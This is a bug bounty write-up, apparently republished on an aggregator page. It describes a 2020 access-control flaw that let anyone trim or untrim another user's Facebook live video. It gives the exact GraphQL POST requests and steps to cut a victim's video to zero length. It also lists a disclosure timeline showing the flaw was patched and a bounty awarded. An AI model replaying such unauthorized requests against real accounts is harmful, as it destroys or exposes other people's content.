(POC) Remove any Facebook’s live video ($14,000 bounty)

3 years ago 145
BOOK THIS SPACE FOR AD
ARTICLE AD

Ahmad Talahmeh

There is a feature (video trimming) which allow Facebook users to remove unnecessary content from their live videos.Only owners can made this on their behalf but according to my testing I observe that it is possible to trim any live video on behalf of the owners which isn’t expected behavior

Impact

Anyone can trim any live video on Facebook. Trimming video to 5 milliseconds will cause the video to be 0 seconds long and the owner won’t be able to untrim it.

1. Obtain target live video ID
2. Obtain current user ID
3. Copy the request

POST
/api/graphql/?__a=1&doc_id=3975916122480615&variables{"input":{"end_time_ms":12000,"start_time_ms":0,"video_id":"valueFromStepOne","actor_id":"ValueFromStepTwo","client_mutation_id":"1"}}

4.Update the field
end_time_ms by time in millisecond which you want the video to end (1 second = 1000 MS, which 10000 MS = 10 seconds), if the video duration is 5 minutes long , the result will make the duration of the video 10 seconds only.

5. Submit the request

Response

{
“errors”:
{

“code”: 1675030,

}

The response returned an error #1675030 but it’s done.

Update the field (end_time_ms) again to remove the video content
end_time_ms:1
This will remove the video content (owner become unable to restore the original video)

The original video duration become 0 seconds long

Assume that the owner has been trimmed their live video.

Untrim the video via (attacker)

- Submit the request

POST
/api/graphql/?__a=1&doc_id=3989508527791126&variables{"input":{"video_id":"ValueFromStepOne","actor_id":"valueFromStepTwo","client_mutation_id":"25"}}

Response

{
“errors”:
{

“code”: 1675030,

}

the response returned an error #1675030, but it’s done (this will result in a privacy issue!)

Impact

Anyone can trim/untrim any live video on Facebook. Trimming video to 5 milliseconds will cause the video to be 0 seconds long and the owner won’t be able to untrim it.

25/09/2020: Report sent

Triaged by Facebook after 2 hours

28/09/2020: Patch confirmed by Facebook

10/10/2020: $11,000 bounty awarded during BountyCon 2020 (with bonus)

12/10/2020: Additional $1150 bounty awarded by Facebook (with bonus)

12/10/2020: Additional $2300 bounty awarded by Facebook (with bonus)

Read Entire Article